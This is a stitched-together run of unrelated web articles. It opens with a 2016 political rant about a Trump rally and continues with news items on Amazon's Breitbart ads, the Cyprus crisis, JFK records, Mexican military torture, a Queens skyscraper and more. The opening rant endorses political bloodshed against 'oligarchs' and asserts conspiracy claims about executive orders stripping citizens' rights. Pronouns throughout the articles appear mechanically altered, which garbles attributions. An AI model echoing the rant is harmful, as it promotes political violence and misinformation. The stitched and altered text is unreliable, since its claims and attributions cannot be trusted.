Kids these days... So the Trump rally in Chicago was successfully disrupted by mostly young and socio-economic despondent protestors who have, unknowingly, been turned into pre-programmed anti-Trump warriors by the Oligarchs they claim to hate (yes MoveOn.org is fully funded by the Oligarchs, look it up). The very same mentality that naively fell hook-line-and-sinker into Obama's message of “Change, Yes We Can”. Now many of these protestors today are simply too young to remember the 2008 Obama campaign for what it really was; the greatest fraud in the history of American politics (and wow is that saying something).
However, this time around there are millions of Americans who do have the benefit of recent history still burned into their hearts. Millions of previously naive, young voters devastated by the deceit of politics, leaving them scorned are now ready to fight the Oligarchs and the bought and paid for Executive and Legislative branches of government. Citizen soldiers are a key component of any revolution.
Remember, Trump supporters are not die hard fans of Trump per se, they are themselves warriors ready take back their nation. And I expect if push comes to shove, which apparently MoveOn.org is dead set on making happen, Trump supporters will respond in kind. And so perhaps the violent revolution begins. The unwavering wave of support against the establishment is not a light hearted movement.
And while a group of young, angry protestors, organized by those who will discard them without so much as a deep breath beforehand, appear steadfast they will soon find out what it means to be on the wrong side of right. While they are rightly ready to fight, they are wrongly allowing themselves to be manipulated in believing their fight is with Trump. For Trump and Sanders are the same movement anthropomorphized in different bodies. And through Trump and Sanders the bloodshed need be directed at the oligarchs.
I'm not a proponent of violence but in a world that has become indifferent to the horrors of inhumanity after 15 years of continuous pre-planned illegal wars paid for by US dollars it is not outside my comfort zone either. If the moment is upon us well so be it. Let's do what we must drive the proverbial wooden stake into the black hearts of the sociopathic psychopaths that have transformed America into their own private golden goose of money and mercenaries.
But talk like this makes people nervous and the oligarchs count on the masses' “better sense”. That is, they have created a system that produces a perpetuity of ill gotten gains they then use to prevent any sort of uprising. But they too have read the history books and so they understand the ancestral instinct to be free. They therefore quietly pass laws that allow “dissident citizens” to be deemed threats to national security simply by uttering those words. “You are a threat to national security”.
If you hear those words directed at you by any government commander it means you no longer have any constitutional rights. A fact that was made law by way of executive order 13528 in Jan 2010 and that will have you placed as a “civilian internee” as described in the follow-on Feb 2010 Operative Manual and solidified by the National Defense Authorization Act, signed Dec 31, 2011 by President Barack Obama from their vacation rental in Kailua, Hawaii. You will have lost your right to due process, Habeas Corpus or any other protections guaranteed you by the Bill of Rights. Everyone should read the following two articles that do well to explain the matter here and here.
It appears the plutocrats themselves are awakening to their own limitations of omnipotence over the world. Their ability to falsify the economic well being of the developed world has deteriorated so sharply so quickly that what was once a threat scenario theorized by The Council of Governors has become a reality, manifesting through the likes of Sanders and Trump. But revolts can be crushed and that is the strategy of MoveOn.org; simple and utter brutishness.
Recognizing the standard program of propaganda via main stream media attacks failed to sunder the sound of revolt it was time to ratchet up the defense of the oligarchs. And so through MoveOn.org Soros et. al will corral those that depend on the state for survival and physically deploy them to disrupt the developing inertia of a larger movement. From their perspective it is fighting (the) unrefined with (the) unrefined; that is, Sanders' disciples against Trump's disciples with the hope that they will destroy each other in grand revolution super nova, not soon to be forgotten by more moderate cattle. Now where this will lead, who knows. But certainly the early indications are not dissimilar to the early indications of some of the great epiphanic moments of human history.
Bezos Won't Quit Breitbart As Local Politicians and Amazon Employees Demand They Drop Ads from the Alt-Right Site, Seattle's Largest Private Employer Remains Silent
Eli Sanders
On a recent Monday, an Amazon employee named Ernesto stopped at a South Lake Union street corner to take a picture. In front of them was a mobile billboard. Its all-caps message blared: "AMAZON, STOP FUNDING BIGOTRY. PLEASE PULL YOUR ADS FROM BREITBART."
Picture taken, Ernesto continued on their walk to lunch. When I caught up with him, they told me he's a 26-year-old software engineer and they moved to Seattle about three years ago from Miami. They declined to give their last name but said they voted for Hillary Clinton in the presidential election. "I haven't read it so much," Ernesto said of the conservative website Breitbart. "But from what I've read, it's the leading website for the so-called alt-right."
True. Breitbart, in the words of founder and current White House chief strategist Stephen Bannon, is "the platform for the alt-right." That's one reason an anonymous online group called Sleeping Giants has spent the last eight months running a campaign aimed at getting companies to pull their ads from Breitbart.
Another reason is the site's content, which is often transparently racist, misogynist, Islamophobic, transphobic, and more. "HOIST IT HIGH AND PROUD: THE CONFEDERATE FLAG PROCLAIMS A GLORIOUS HERITAGE," read one offensive Breitbart headline from July 2015. Other offensive Breitbart headlines include "BIRTH CONTROL MAKES WOMEN UNATTRACTIVE AND CRAZY" (December 2015), "TEENAGE BOYS WITH TITS: HERE'S MY PROBLEM WITH GHOST- BUSTERS" (July 2016), "GABBY GIFFORDS: THE GUN CONTROL MOVEMENT'S HUMAN SHIELD" (March 2015), and "THERE'S NO HIRING BIAS AGAINST WOMEN IN TECH, THEY JUST SUCK AT INTERVIEWS" (July 2016).
So far, more than 2,300 companies and organizations have stopped advertising on Breitbart in response to the Sleeping Giants campaign, including well-known brands like Campbell's Soup, Kellogg's, Bed Bath & Beyond, Mercedes-Benz, Nestlé, Hallmark, Squarespace, and BMW. Even companies that are not known for their liberal sympathies—such as Uber, British Petroleum, and Chase Bank—have pulled their ads. According to the online media and marketing news site Digiday, the effect on Breitbart's advertising base has been significant, with "just 26 brands appearing on Breitbart in May, down from a high of 242 in March." (Though, as Digiday also notes, "even if Breitbart's advertising dries up completely, it still has a billionaire benefactor in Robert Mercer," the right-wing hedge fund manager who was a big supporter of both the Trump campaign and the Brexit push.)
Yet as other major companies abandon Breitbart advertising, Amazon remains a stubborn, silent holdout.
The company refuses to publicly respond to the demand that it stop funding Breitbart through ad buys. It did not reply to a request for comment for this article, and it has so far declined to heed the wishes of a group of more than 600 Amazon employees who have organized around this issue, calling on their employer to stop providing ad revenue for a site that mocks values the company claims to uphold in its day-to-day business practices.
Ernesto told me they personally agree with the campaign to get Amazon to pull its Breitbart ads, as did other Amazon workers out on their lunch break that Monday. One 24-year-old program manager, when they learned their company isn't dropping its Breitbart ads, responded, "That's shitty." They were eating their lunch on the steps near the South Lake Union Whole Foods (purchased by Amazon as part of a $13.7 billion deal last month). While the mobile billboard from Sleeping Giants circled the block, they added: "I personally don't agree with almost anything that's published on Breitbart."
As the effort to get Amazon's attention grinds on, some local politicians are joining the outcry and backing the employee group. Seattle mayoral candidate Cary Moon told me they "absolutely" supports the campaign to get Amazon to drop its Breitbart ads. "Amazon employees have been talking about this since January," Moon said. "It's the right thing to do, and I encourage Amazon to get on the right side of history." Two other candidates for mayor, Jessyn Farrell and Mike McGinn, also said they support the campaign. (Mayor Ed Murray did not respond to repeated questions about their position on the city's largest private employer purchasing advertising on Breitbart. No member of the Seattle City Council would comment either, nor would the three other leading candidates for mayor: Nikkita Oliver, Bob Hasegawa, and Jenny Durkan.)
Interestingly, two Amazon subsidiaries have pulled their advertising in response to the Sleeping Giants campaign: Zappos and Audible. Still, one can regularly find ads for the Amazon marketplace on Breitbart. As recently as July 10, the Breitbart homepage offered me click-through Amazon ads for books, including The Curious Kid's Guide to Donald Trump.
Initially, part of what caused even unlikely organizations like Greenpeace and Save the Children to end up with ads on Breitbart is something called "programmatic advertising." From the consumer side, programmatic ads are the ones that follow you around from website to website because, at some point in your digital life, you somehow expressed an interest in, say, Crocs, and then some internet advertising companies noticed. From the retailer side, "programmatic advertising" is often an easy opportunity for, say, Amazon to make a large, undifferentiated purchase of ads that it's been promised will land in front of eyeballs that are likely to be interested in shopping at Amazon.
But just as buyers and sellers of programmatic advertising long ago figured out how to keep ads for Cheerios from popping up on hardcore porn sites, they have long since figured out how to keep Amazon's ads from popping up on Breitbart—if Amazon wishes.
Why Amazon instead wishes to continue advertising on Breitbart remains a mystery.
"It seems really antithetical, not just to your business but to your own company to be putting your ads on a site that's denigrating all those people," said one of the Sleeping Giants organizers, who, like the other organizers of the group, won't give their name because they all work in media-related fields. "We've been trying to get an answer. It's been really difficult and, honestly, really depressing... There aren't really any big brands left on there but Amazon."
One theory that floats around is this: Amazon CEO Jeff Bezos, who purchased the Washington Post in 2013, has been a repeated target of threats from President Donald Trump. CNN has described this as "Donald Trump's War on Jeff Bezos." During the presidential campaign, Trump said of Amazon, "Believe me, if I become president, oh do they have problems." In May, nearly four months after taking office, Trump told Fox News that Bezos "has a huge antitrust problem." Then, on June 28, Trump took to Twitter to describe "the #AmazonWashingtonPost" as "FAKE NEWS." They also accused Amazon of "not paying internet taxes" (again). That claim is false—although one could argue that Amazon is not paying enough taxes on its internet sales, which is where the Trump threat lies. By continuing to fund Breitbart through advertising buys, perhaps Bezos gives themselves a way to calm fuming Republicans in DC when they corner them and threaten punishment for their paper's supposed liberal—or anti-Trump—agenda.
"It's definitely something we've thought of from the beginning," said the Sleeping Giants organizer. But in the absence of any comment from Amazon, the organizer added, "Your guess is as good as mine."
BRUSSELS (Reuters) - Euro zone finance officials acknowledged being “in a mess” over Cyprus during a conference call on Wednesday and discussed imposing capital controls to insulate the region from a possible collapse of the Cypriot economy.
People queue up to make a transaction at an ATM outside a branch of Laiki Bank in Nicosia March 21, 2013. REUTERS/Yorgos Karahalis
In detailed notes of the call seen by Reuters, one official described emotions as running “very high”, making it difficult to come up with rational solutions, and referred to “open talk in regards of (Cyprus) leaving the euro zone”.
The call was among members of the Eurogroup Working Group, which consists of deputy finance ministers or senior treasury officials from the 17 euro zone countries as well as representatives from the European Central Bank and the European Commission. The group is chaired by Austria's Thomas Wieser.
Cyprus decided not to take part in the call, a decision that several participants described as troubling and reflecting the wider confusion surrounding the island's predicament.
“The (Cypriot) parliament is obviously too emotional and will not decide on anything, if Cyprus does not even feel that they can attend the call it is a big problem for us,” the French representative said, according to the notes seen by Reuters.
“We have never seen this.”
The German representative raised the need to learn more about capital outflows from Cyprus to Russia and Britain, and emphasised that “we stand ready to find a solution immediately” as long as the parameters of the bailout agreed among euro zone finance ministers on Saturday are respected.
The official also referred to the need to resolve the issue of Cyprus's two biggest banks, both of which are close to collapse, and mentioned the possibility of Cyprus leaving the euro zone.
In the event of an exit, the official said steps needed to be taken to “ring-fence” the rest of the euro zone from the impact and to ensure there was no contagion to Greece.
One issue repeatedly raised on the call was the risk of large outflows of capital once Cypriot banks reopen, probably on Tuesday. The ECB representative said the situation was being closely monitored and “technical preparations” were being made to try to limit the amount of any outflow.
“Some additional laws need to be passed. Overall we are in a very difficult situation,” the official said, according to the notes. “(We're) trying to do everything within the powers to limit any unauthorised outflows.”
Cyprus's finance minister continued discussions in Moscow on Thursday to see whether a way can be found to involve Russia in the bailout so that large depositors in Cypriot banks, many of whom are Russian, are not hit with a one-off levy.
Financial markets have largely taken the problems in Cyprus in their stride, perhaps calculating that any collapse of an economy worth only around 17 billion euros, will have only a limited impact, or that a solution will be found in the end.
“Markets believe that we will find a solution and that we will provide more money and this might not be the case,” one of the participants on the call said, according to the notes.
In wrapping up the teleconference, the chairperson described the situation as “foggy” and expressed concern about Cyprus's decision not to take part in the call.
“The economy is going to tank in Cyprus no matter what,” the notes quoted them as saying. “Restrictions on capital will probably be imposed,” they said, adding that further conference calls would be organised in the coming days.
The National Archives and Records Administration (NARA) released 676 additional JFK assassination records today. It appears that 582 were “withheld-in-full,” meaning they have never been seen by the public. From NARA:
The majority of the public release today consists of 553 Central Intelligence Agency (CIA) records that were previously denied in their entirety. Also included in the release are records from components of the Departments of Justice (18) and Defense (48), the House Select Committee on Assassinations (56), and the National Archives (1). Released records are available for download.
Our initial brief inspection has indicated, however, that some of the files contain heavy redactions.
Here is a CIA personnel file on David Sanchez Morales, who is believed by many researchers to be a key suspect in the JFK assassination. Notice the number and extent of the redactions:
.
The White House has said that it will release the remaining approximately 30,000 files on a rolling basis over the next six months, subject to agency review.
The National Archives sent out a press release today saying, “The records included in this public release have not been reviewed by NARA.”
Stay tuned as WhoWhatWhy brings you more.
Related front page panorama photo credit: Adapted by WhoWhatWhy from JFK (National Archives), National Archives building (National Archives) and National Archives Logo (National Archives / Wikimedia).
Where else do you see journalism of this quality and value? Please help us do more. Make a tax-deductible contribution now.
Our Comment Policy Keeps it civilized, keep it relevant, keep it clear, keep it short. Please do not post links or promotional material. We reserve the right to edit and to delete comments where necessary. Related print
By By Kesavan Unnikrishnan May 8, 2016 in Environment Aerial and Satellite images show rising sea levels have caused five islands in the Solomons in the South Pacific to completely disappear, the first scientific evidence that confirms the dramatic impact of climate change on low-lying islands. The five islands — Kakatina, Kale, Rapita, Rehana and Zollies — that vanished ranged in size from one to five hectares and supported dense tropical vegetation that was at least 300 years old. The authors of the study said: Climate change induced sea-level rise is anticipated to be one of the greatest challenges for humanity over the coming century. Shoreline recession at two sites has destroyed villages that have existed since at least 1935, leading to community relocations. The report also warned that Taro, the capital of Choiseul Province,is likely to be the first provincial capital in the world to relocate its residents in response to the impact of sea-level rise. Melchior Mataki who chairs the Solomon Islands' National Disaster Council, This ultimately calls for support from development partners and international financial mechanisms such as the Green Climate Fund. This support should include nationally driven scientific studies to inform adaptation planning to address the impacts of climate change in the Solomon Islands. Solomon Islands, seen as a hot-spot for sea-level rise due to climate change, has seen its sea-level rise at almost three times the global average, around 7-10 mm per year since 1993. A newly published study by Australian academics using time series aerial and satellite imagery of 33 reef islands from 1947- 2014 reveals that 11 islands across the northern Solomon Islands have either totally disappeared over recent decades or are currently experiencing severe erosion due to sea level rise.The five islands — Kakatina, Kale, Rapita, Rehana and Zollies — that vanished ranged in size from one to five hectares and supported dense tropical vegetation that was at least 300 years old. The authors of the study said:The report also warned that Taro, the capital of Choiseul Province,is likely to be the first provincial capital in the world to relocate its residents in response to the impact of sea-level rise.Melchior Mataki who chairs the Solomon Islands' National Disaster Council, said Solomon Islands, seen as a hot-spot for sea-level rise due to climate change, has seen its sea-level rise at almost three times the global average, around 7-10 mm per year since 1993. More about Solomon islands, Rising sea levels, Islands Solomon islands Rising sea levels Islands
Unexpectedly coming in third, Arnaud Montebourg holds many of the cards that will decide the second round of the French Socialist Party's primaries, a battle between centrist François Hollande and left-leaning Martine Aubry.
ADVERTISING Read more
An unexpected wildcard has been thrown into the battle for the French Socialist Party (PS) presidential nomination - in the form of anti-globalisation candidate Arnaud Montebourg.
Montebourg came third with 17% in Sunday's US-style primaries, after favourite François Hollande (39%) and the PS First Secretary Martine Aubry (30%).
Already ahead of French President Nicolas Sarkozy in the polls, left-of-centre Hollande had been looking for a clear mandate ahead of next year's presidential elections, which France's socialists have continually lost since 1988.
But with none of the candidates taking more than 50% of the vote, the primaries will go to a second round next weekend.
The rise of Montebourg
Montebourg's result was particularly surprising as only one month ago polls gave them just 5% of the vote, according to Jean-Marc Lech, director of international polling and research company IPSOS.
Montebourg is standing on a far-left anti-globalisation platform. They have also called for the state to take greater ownership of banks and wants crackdowns on tax havens.
“Just in the last week their poll rating went up to 11%,” Lech told France 24 on Monday. “And then they took to the stage with Martine Aubry [who is closer to them politically] last week. They have a political style that the French like, and they have policies that appeal to the far left of the Socialist Party.”
According to FRANCE 24 Political Editor Roselyn Febvre, Hollande is the last person to whom Montebourg would lend their support as their political differences are complemented by a mutual dislike.
Wake-up call for Hollande
The result has been a huge humiliation for former presidential candidate Segolene Royal – but also a wake-up call for Hollande, whom Lech said was “resting on theirs laurels”.
“Hollande has made the big mistake of behaving like they have already won next year's presidential election,” said Lech, adding that Royal (7%) was “spouting the same old lines as they did back in 2007”.
“Montebourg's success is going to be a big headache for Hollande, because their supporters will naturally switch to Aubry.
“Hollande needs to be seen to embrace and embody the values of the left, and to show that Aubry is yet another unelectable Socialist candidate. And they only has a week to do it.”
Hollande is likely to count on the support of the 5% who voted for the more centrist Manuel Valls, and will look to scoop the 7% who voted for their previous partner and the failed 2007 election candidate Segolene Royal.
On Monday Hollande told RTL radio that they expect to win next weekend's runoff vote “by a small margin”.
Sarkozy's UMP to hold primaries in future?
Sarkozy's conservative UMP party is keeping a close eye on the primaries, with commentators suggesting that the high turnout and the boost they are giving to the PS could be shared across the political spectrum.
UMP Member of Parliament Jacques Myard told FRANCE 24 on Monday that nothing could be ruled out for the following elections in 2017.
“What is certain is that we are seeing a new way of doing politics that seems, for the moment, to be working," they said. "We will have to see how the second round plays out, however, and I think we are likely to see many more divisions appear between the two main candidates.”
MEXICO CITY -- The Mexican army said Thursday that two of its soldiers face military charges after a video surfaced of them helping a federal police officer torture a female suspect.
A female military police officer is seen in the video interrogating the woman. They pull their hair and places the muzzle of their rifle against the woman's head.
Later, a blue-uniformed federal police officer puts their head inside a plastic bag.
The Defense Department says the events occurred Feb. 4, 2015 in Ajuchitan, a small mountain town in southern Guerrero state. Opium poppy plantations are common in the area where drug cartels operate.
The federal police officer placed a plastic bag over the woman's head until they almost passed out. It is unclear if the police officer -- apparently also female -- faces charges.
Mexico's army said Thursday that the two soldiers are in a military prison facing charges of failure to obey orders.
The Defense Department said that civilian prosecutors had been advised of the incident. Under Mexican law, civilian prosecutors are supposed to investigate army abuses against civilians, but soldiers can also face simultaneous charges in military tribunals.
The chilling, four-minute video shows the handcuffed woman sitting in the dirt, crying, outside a rural cinder-block house.
The female soldier asks them repeatedly during and after the torture, "Are you going to talk? Yes or no? Now do you remember?"
"Do you want more? Who is this damn Maria?"
As the suspect lies inert on the ground, the female soldier asks them "Do you remember now? Or do you want the bag again? Or water? Or (electric) shocks? Tell me what you want."
The military justice system acted much more quickly in the case than civilian prosecutors. The army said it found out about the video -- apparently taped by a police officer or soldier at the scene -- in December, and arrested the two soldiers in January.
Civilian prosecutors could not say whether any charges had been filed against anyone in civilian courts.
Raul Benitez, a security specialist who teaches political science at the National Autonomous University of Mexico, said "the military justice system tends to be very strict in such cases, because (the soldiers in the video) are casting the institution in a bad light."
But Benitez also noted the case was unusual in that the proof is so obvious and unarguable.
"There are abuses by soldiers, but there often isn't this kind of solid proof," said Benitez. "They are not accustomed to acknowledging such cases, unless the evidence is overwhelming."
The Americas director for Human Rights Watch, Jose Miguel Vivanco, said that "torture and inhuman, cruel and degrading treatment continue to be the traditional methods of 'investigation' and punishment in Mexico."
"As long as those directly responsible for these practices, and those who cover up for them, aren't brought to justice, there will never be any chance to combat or eliminate" torture, Vivanco said.
The army said that "ïn this case or any other case where military personnel abuse human rights, energetic and rigorous action will be taken against those responsible."
Warning: The contents of the video are graphic and may be disturbing for some viewers.
The video can be seen here.
This list of Linux benchmark scripts and tools should prove useful for quick performance check of CPU, storage, memory and network on Linux servers and VPS. Recently, I used a Linux benchmark script which was no longer maintained by the. As a result, I compiled this quick list of scripts and tools for Linux benchmarking. Check each script before running from command line.
Most of these scripts are written in Bash and will benchmark the CPU, memory, storage and network. In most cases the CPU Model, frequency, number of cores will be displayed along with basic CPU performance bench. Memory total will be displayed (see the other more extensive tools below for memory specific benchmarks). System storage (ssd or harddisk) input/output speeds will be tested and finally the server's internet connection will be tested by downloading files from common test locations around the world.
If your web host points to the cause of poor application performance as being solely related to webdev, use these command line scripts to help verify if hardware (example: disk/storage bottleneck) or network may also be to blame.
Linux Benchmark Scripts
Other Linux Benchmark Tools
Use at your own risk. Always verify before running. If you find any broken scripts or issues please notifiy me.
Maintained on github. (Submit suggestions)
FRISCO, Texas (Thursday, Jan., 2, 2014) – FC Dallas has re-signed defender Zach Loyd, the club announced today. Per team and league policy, terms of the agreement will not be disclosed.
Drafted fifth overall by FC Dallas in the 2010 MLS SuperDraft, Loyd appeared in 111 of the club's 132 MLS regular-season matches in the past four seasons, second only to Jair Benitez (114). The UNC product has scored three goals and added seven assists in 102 starts. They recorded their lone goal of the 2013 season in a 3-0 win against the Houston Dynamo in Lamar Hunt U.S. Open Cup competition on June 12.
READ: Loyd pleased to be remaining with FC Dallas
“It was always a priority for FC Dallas to sign Zach to a new agreement,” said FC Dallas Technical Director Fernando Clavijo. “It was not until the season was over that we started to make progress. Zach has been a big part of FC Dallas for the last four seasons and we are ecstatic to have them back.” Loyd logged career highs in games played (32), games started (31), minutes played (2,696) and goals scored (2) during the 2012 campaign. They also had three assists, two of which were game-winning assists. Loyd made their professional debut in FC Dallas' second match of the 2010 season, playing a full 90 minutes in a 2-2 draw with the Columbus Crew on April 10 at Toyota Stadium.
Loyd earned the first of their three caps for the U.S. Men's National Team by starting and playing 73 minutes against Chile on Jan. 22, 2011.
[Updated below with a response from the McCrory administration]
For creationists, fossil fuels tend to pose a tricky dilemma. On the one hand, they want to believe the Earth is between 6,000 and 10,000 years old. On the other hand, fossil fuels are millions of years old. You see the problem.
To solve the riddle, some on the far-right fringe have come up with some pretty creative theories. World Net Daily's Jerome Corsi, for example, has argued that Nazis discovered that oil is an infinite natural resource; the Soviet Union learned this; but some nefarious officials in the U.S. hid the truth from the public.
Now, there's nothing especially surprising about fringe people adopting fringe ideas. In fact, it's largely inconsequential – World Net Daily occasionally influences politicians like Sen. Rand Paul (R-Ky.), but in general, most sensible folks have some rudimentary understanding of where oil comes from. Weird extremists have a very limited ability to influence public policy.
But consider this recent exchange between WRAL's Laura Leslie in North Carolina and John Skvarla:
LESLIE: I'm thinking about what you're saying about natural gas and that's true. You know, obviously, it's very cheap right now. You know, on the flip side, it's a finite resource and fossil resource. I mean, is there – SKVARLA: There are some people who disagree with you. The Russians, for instance, have always drilled oil as if it's a renewable resource. So far, they haven't been proven wrong. There's a lot of different scientific opinion on that.
And who, exactly, is John Skvarla? He's the guy North Carolina Gov. Pat McCrory (R) chose to lead the Department of Environment & Natural Resources.
In other words, John Skvarla thinks fossil fuels may be an infinite natural resource, and North Carolina's Republican governor put them in charge of environmental policy in the state.
Rachel's segment on this last night is well worth your time – really, watch it – and it's worth emphasizing that we called Skvarla's office in the hopes that they could shed some light on their rather creative views. So far, we haven't heard back. [Update: see below.]
While we wait, note that Skvarla isn't just fuzzy on fossil fuels; North Carolina's top environmental official also isn't sure climate change is real. Gov. McCrory is apparently equally unsure.
Why does it matter that North Carolina's top environmental official doesn't seem to fully understand the basics of what a fossil fuel is? Because the state is experiencing a rather serious issue right now involving coal-ash spills polluting local rivers, and it's important that state officials rely on sound thinking so that North Carolina gets the science right.
And right now, the McCrory administration isn't getting the science right.
Skvarla's position is that it's irresponsible to move coal ash pits that are leaking toxins. The scientific consensus says the opposite. Rachel, citing a WRAL report , explained last night:
“WRAL asked the agency, Mr. Skvarla's agency for a citation or source for the alleged concerns about environmental risks of cleaning up and moving these coal ash ponds. The agency was unable to provide any citation. “A renowned national expert on coal ash ponds at Duke University says that's because there isn't one. Dr. Avner Vengosh of Duke University has published multiple studies on coal ash skills and contamination. Told about John Skvarla's comments, the scientist tells WRAL, ‘There's no published study that casts any doubt on whether moving coal ash out of leaky landfills is the best move for the environment.' “The exact quote from the scientist is this, ‘What are they talking about? Of course not. If there's evidence of groundwater contamination and surface water contamination at the coal ash pond, then leaving it as is obviously isn't an option if the environment is something you care about. You don't need to be Joe chemist to figure that out.'”
Update: We heard back from Skvarla's office this morning, which said their “ overall point was that science should drive policy, not the other way around.” Their office added, “ When the reporter spoke of fossil fuels as a finite resource, which I think most of us believe it is, they took the opportunity to point out that there are those around the world, even in the scientific community, who take different positions. In other words, there is a diversity of opinion that the reporter was not acknowledging. They were not agreeing with the Russian position on the matter, just pointing out positions of which they were not aware.”
Here is the original interview, aired in January 2013. It's worth noting that within the scientific mainstream, there is no diversity of opinion on whether fossil fuels are finite or infinite.
TRIPOLI (Reuters) - After days of Western air strikes, some people in the Libyan capital felt bold enough on Tuesday to drop their customary praise of leader Muammar Gaddafi for a few moments and say instead they want them gone.
Residents who spoke to Reuters reporters in Tripoli were still too wary to give their names, and switched back to extolling Gaddafi when officials came within earshot.
But their willingness to openly criticize the man who has led the country for four decades was a marked change from the normal pattern, when people have been too frightened of retribution to speak candidly to reporters in the street.
“Here, everyone is waiting. It's not like before,” said one man, who steered a reporter away from a government minder toward a coffee shop in Tripoli's medina, or old city, so they could speak freely.
“My children are afraid but I know it's all changing. This is the end. The government has no control any more.”
Keeping public opinion on their side in Tripoli is vital to Gaddafi's grip on power because the capital is their biggest remaining stronghold, after the next two biggest cities in Libya were taken over by rebels.
“CRITICAL MOMENT”
In the medina, the sound of pro-Gaddafi songs could be heard from nearby Green Square, where a handful of supporters was holding a rally as soldiers with AK-47 assault rifles slung over their shoulders stood at the base of a fortress in the square.
Their numbers were sharply down on the thousands who were gathering a few weeks ago.
In past weeks, Libyans have quickly praised Gaddafi in conversations with reporters. There was none of that in discussions on the streets on Tuesday. Those who did not criticize Gaddafi expressed concerns that the country was facing yet another confrontation with the West.
Muhammad Muftah, who sells watches, including ones with portraits of Gaddafi, no longer works at night for fear of air strikes. It is not only their business that is suffering.
“Of course our children are scared when the anti-aircraft guns are fired. We tell them it's fireworks,” they said, sitting on a chair outside their sidewalk shop.
Isa, a bespectacled business person with family in Britain, praised Gaddafi when a minder was close, but when the official moved away they changed tack.
“This is the moment. It's critical. The bombs are booming at night. But we are watching the sky and we see the world is trying to help,” they said.
A man working in a clothing shop did not want to give their name because they said it was too risky for them to be identified, but they did say: “We want Gaddafi to go.”
“We are happy that the West is attacking their forces but we don't want them to get rid of him. We want to do it ourselves. Libyans should get rid of him.”
One old woman sat in the shade of an Italian colonial building, muttering “Allah, Muammar and Libya and that's it,” a pro-Gaddafi phrase often repeated over and over whenever foreign journalists appear.
They were ignored by nearby shopkeepers who until a few days ago seemed keen to start shouting slogans at any opportunity. They have been counting their losses since an uprising inspired by revolts in Tunisia and Egypt broke out in Libya on February 17.
In another change from the usual reticence shown by people in Tripoli around foreign reporters, a man working in a jewelry shop gave their opinion without being asked.
“He (Gaddafi) should have handled it differently. They opened fire on those protesters. They had a legitimate cause. We want changes in this country now.”
Gaddafi and their officials say the rebels are al Qaeda militants who are trying to destroy the country.
“Don't believe any of this,” said the man in the jewelry shop. “It has nothing to do with al Qaeda.”
“These are protests against the system. We all know that Gaddafi is the problem,” they said. Moments later a minder walked into the shop and the shopkeeper fell silent.
The residential high-rise at 23-10 Queens Plaza South in Long Island City, also known as 23-01 42nd Road, has reached its final height of 481 feet, beating the 429-foot-tall Linc LIC for the title of the second tallest skyscraper in Queens.
Concrete formwork has been removed from the concrete parapet at the top of the 44-story tower, and only a few levels of the sheer glass façade are left to be finished on the curtain wall.
The 330,000-square-foot project is being developed by Property Markets Group, Kamran Hakim, and New Valley LLC.
The building stands at the northwestern corner of the 2001 Long Island City core rezoning district, which is seeing a frenzy of new development that will redefine the borough's image. A handful of high-rises taller than 23-10 Queens Plaza South have already begun their march in the Queens Plaza and Court Square districts to the south and east, and 28 On 28th already rises higher than the new building's roofline just three blocks to the east. However, the tower's standalone location at the edge of the redevelopment district guarantees its skyline presence for years to come.
Standing at the foot of the Ed Koch Queensboro Bridge, the glass slab greets borough visitors as a bold manifestation of Long Island City's ongoing transformation.
Two flags have been raised over the western end of the concrete parapet. While the American flag is part of the topping out tradition, the Irish flag is an overseas homage to the nation where the tallest building is almost exactly half the height of the new tower.
The design by SLCE Architects presents an effective way of combining the old and the new by preserving industrial legacy while adding hundreds of thousands of square feet of office and residential space. The 40,000-square-foot site occupies an entire block between Queens Plaza South, 42nd Road, and 23rd and 24th Streets.
The glass slab stands on the southern portion of the lot at the 23-01 42nd Road address. It occupies a 185 by 80 foot lot and houses 391 residential units, as well as the majority of the project's amenities.
A uniform grid of floor to ceiling windows is interrupted only by dark bands that run vertically up the building's core.
The tower is joined to a pre-war industrial loft structure directly north, slated for conversion into 30,650 square feet of commercial space. The second floor of the historic building is slated to accommodate 195 parking spaces, even though its R9 zoning district means that there is no minimum parking requirement at the site.
While dedicating so much space of a lucrative industrial conversion to parking would have been questionable for most projects, the move makes sense given that the second floor is overshadowed by the adjacent elevated track of the 7 train, meaning that the shadow-bound floor would have been potentially difficult to lease to prospective office tenants.
Although the glass curtain wall of the new addition contrasts with the old building, the tower's ground floor columns and cornice will be clad in stone in order to provide a stylistically harmonious appearance. The wide floor-to-ceiling windows between the columns will turn the lobby into a bright, visually open space.
A very tall communal floor, several dozen feet in height, occupies the upper portion of the tower base.
A two-story loft building similar to its larger neighbor was demolished to make way for the tower, but given the preservation of the larger building next door, as well as the density the project will bring to the currently desolate neighborhood, the net trade-off is positive.
The project stands within one of the most elaborate elevated interchanges in the city. To the north, it is bounded by Queens Plaza, where the monumental ramp of the Ed Koch Queensboro Bridge sends two levels of traffic lanes and a pedestrian path up and over the East River into Manhattan, while the elevated N and Q trains are redirected into the tunnel below.
The 7 train splits from the stack at 23rd Street and makes a 90-degree turn to the south, bringing the double-stacked elevated tracks within mere feet of the loft building.
While these train tracks hug the building's base to the north and west, another series of elevated bridge ramps run less than a hundred feet away to the west and south. Together, the elevated track conduits surround the project on three sides. On two of these, they pass directly next to the windows, while the bridge ramp passes a block south.
While there is certain gritty, urbanist appeal in this dynamic layering of transportation, it is also a source of pollution and noise, particularly from the trains making the 90-degree turn. On the other hand, it also translates into a variety of convenient transportation options. Midtown Manhattan is minutes away by train, car, or even bike or foot via the bridge.
Together with QLIC one block north, the two projects are pushing the frontier of development along Queens Plaza to its farthest western extent. Beyond the elevated ramps of the infrastructure knot lies the old, gritty Long Island City, dominated by parking lots, industrial lofts, infrastructure facilities, and commercial complexes.
The iconic, historic Silvercup sign dominates the neighborhood as it sits on top of the studios. Queensbridge Houses, the largest public housing project in North America, starts three blocks to the northwest, on the other side of the bridge.
While the neighborhood to the east and southeast is developing as a new high-rise plateau, the low-rise character of the Silvercup district to the west means that 23-10 Queens Plaza South boasts arguably the best views of any residential building in central Long Island City. Aside from Hunters Point towers half a mile to the southwest, no large buildings stand between the 44-story tower and sweeping westward panoramas of the East River, the Queensboro Bridge, and Midtown Manhattan beyond. No tall buildings are projected to block these postcard-worthy views any time in the immediate future, which is something that most of the incoming neighbors to the east and south, despite their size and height, cannot offer.
Just as the former structures that occupied 23-10 Queens Plaza South used to be rusting relics from a bygone era, the sites to the west are bound to undergo a similar transformation as development continues its unrelenting march.
